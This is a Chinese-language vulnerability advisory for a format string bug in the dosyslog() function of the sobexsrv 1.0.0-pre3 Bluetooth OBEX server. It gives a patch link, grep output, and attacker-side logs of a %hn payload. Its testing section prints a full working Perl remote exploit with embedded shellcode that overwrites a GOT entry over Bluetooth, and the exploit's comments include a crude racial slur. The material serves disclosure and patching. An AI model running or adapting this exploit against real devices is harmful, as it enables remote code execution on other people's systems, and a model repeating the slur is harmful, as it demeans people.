发布日期：2005-12-03
更新日期：2005-12-03

受影响系统：

Mulliner sobexsrv 1.0.0-pre3

不受影响系统：

Mulliner sobexsrv 1.0.0-pre4

描述：

---

BUGTRAQ  ID: 15692

sobexsrv是一款灵活、安全的蓝牙OBEX服务程序。

sobexsrv的Dosyslog函数中存在格式串处理漏洞，成功利用这个漏洞的攻击者可以导致拒绝服务或远程执行任意代码。

例如：

1 使用internal模式设置，以syslog(8)记录并INBOX到/tmp中：
   sobexsrv -IS -r /tmp

2 以chroot和蓝牙安全模式2设置：
   sobexsrv -s 2 -ISR -l X -r /tmp

上面的例子说明-S选项用于启用syslog()日志。在syslog对日志函数的支持中存在格式串漏洞，在使用dosyslog()时一些用户输入传送给了没有格式化的syslog()调用。

kfinisterre@animosity:~/sobexsrv-1.0.0_pre3$ grep syslog\( . -rin
./src/obexsrv.c:58:     void dosyslog(char *m1, void *m2, void *m3)
./src/obexsrv.c:71:     syslog(LOG_INFO, log);
...
./src/obexsrv.c:203:    dosyslog("folder listing for \"%s\"\n", path, 0);
./src/obexsrv.c:290:    if (ret) dosyslog("pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:291:    else dosyslog("failed pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:334:    if (ret) dosyslog("pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:335:    else dosyslog("faild pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:356:    if (ret) dosyslog("deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:357:    else dosyslog("failed deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:401:    dosyslog("created directory \"%s\"\n", fullpath, 0);
./src/obexsrv.c:406:    dosyslog("failed to create directory \"%s\"\n", fullpath, 0);
...

下面的例子在windows机器上使用Widcomm蓝牙栈在远程主机上创建名为"--AAAABBBB%19$x.%20$x"的文件夹：

kfinisterre@threat:~$ sobexsrv -ISd -r /home/kfinisterre/
security: mode = 1
REQHINT - add handler for this!
CONNECT start
CONNECT ok, result = 1
CONNECT end
REQDONE
REQHINT - add handler for this!
PUT start
PUT name:
%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
PUT length: 201
PUT body length: 201
PUT data_type 1
internal_handler: put for
"/home/kfinisterre//%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
length 1
PUT ok
PUT end
REQDONE
REQHINT - add handler for this!
DISCONNECT start
DISCONNECT end
uid00(kfinisterre) gid00(kfinisterre)
groups (dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre)

攻击者角度所见内容如下：

animosity:/home/kfinisterre/ussp-push-0.4# ./sobexsrv.pl
pushing file /tmp/shellcode
name=/tmp/shellcode, size 1
Registered transport

set user data

created new objext
Local device 00:11:B1:07:BE:A7
Remote device 00:0B:0D:63:0B:CC (1)

started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!

Connection return code: 0, id: 0
Connection established
connected to server
Sending file:
%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,
path: /tmp/shellcode, size: 201
reqdone
Command (02) has now finished, rsp: 20reqdone
Command (01) has now finished, rsp: 20Disconnect done!pushed!!

<*来源：Kevin Finisterre （dotslash@snosoft.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113364326902313&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl
#
# trifinite.group Bluetooth sobexsrv remote syslog() exploit
# code by kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com
#
# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!
# Big ups to d4yj4y beeeeeeeeeeeeeotch!
#
$retloc = 0x8053418;   # Due to unicode the filename is NOT usable. Must use file contents.

# R_386_JUMP_SLOT exit()
$addy  = "\x5a\x19\x05\x08";
$addy2 = "\x58\x19\x05\x08";

$lo = ($retloc >> 0) & 0xffff;
$hi = ($retloc >> 16) & 0xffff;

$hi = $hi - 0x38;
$lo = (0x10000 + $lo) - $hi - 0x38;

#print "hi: $hi\n";
#print "lo: $lo\n";

$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200;
#print $string . "\n";

$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35".
"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e".
"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56".
"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30".
"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56".
"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35".
"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a";

open(F, "> /tmp/shellcode") or die "can't open file";
print F "$sc\n";
close(F);

system($string);



--------------080500030004040604030203--

建议：

---

厂商补丁：

Mulliner
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.mulliner.org/bluetooth/sobexsrv-1.0.0pre4.tar.gz

浏览次数：3365
严重程度：0（网友投票）